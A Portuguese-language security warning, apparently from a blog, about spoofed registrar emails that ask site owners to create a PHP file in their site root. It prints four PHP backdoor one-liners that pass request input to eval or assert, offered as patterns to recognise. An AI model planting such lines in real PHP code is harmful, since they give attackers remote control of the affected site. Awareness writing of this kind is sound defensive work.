Não confie nesses e-mails falsos de confirmação de domínio
Se você receber uma carta de qualquer tipo solicitando a criação, download ou instalação de algum código PHP em seu site, você deve ignorá-la
English version: Do not trust those fake domain confirmation emails
Recentemente, alguns de meus clientes receberam cartas estranhas por e-mail de seus registradores de domínio. Essas cartas contêm um pedido de confirmação de domínios próprios. Verifiquei uma dessas cartas e rapidamente a identifiquei como fraudulenta . Todas as letras possuem um padrão idêntico e uma solicitação para criar um arquivo PHP na pasta raiz de um site com um nome específico e conteúdo determinado. Escusado será dizer que o conteúdo sugerido para esse arquivo PHP contém código malicioso conhecido como código backdoor. Esse tipo de código permite que o invasor execute qualquer ação que desejar no site da vítima.
Se você receber uma carta de qualquer tipo solicitando a criação, download ou instalação de algum código PHP em seu site, você deve ignorá-la. Sem exceções. Mesmo que a carta venha do presidente ou da sua mãe.
Cartas fraudulentas parecem legítimas por causa do endereço de e-mail legítimo. Mas é uma falsificação de e-mail. Você não espera receber um e-mail falso de seus amigos ou do registrador de domínio. Certo? Não! Qualquer carta de e-mail pode conter qualquer endereço de e-mail De. A grande maioria dos servidores e clientes de email não verifica ou verifica o endereço do remetente. Então, você vê isso como um hacker queria. Você não deve confiar em nenhuma carta de e-mail recebida de um remetente conhecido se a carta contiver uma solicitação para alguma ação suspeita, como a instalação de código em seu site ou aplicativo em seu computador.
Detalhes técnicos
E-mails falsos geralmente contêm algumas das seguintes linhas PHP.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Para sua informação: base64_decode, eval e assert são marcadores bem conhecidos de código PHP suspeito ou malicioso.
Veja também: Plugin Inspector revela problemas de segurança com outros plugins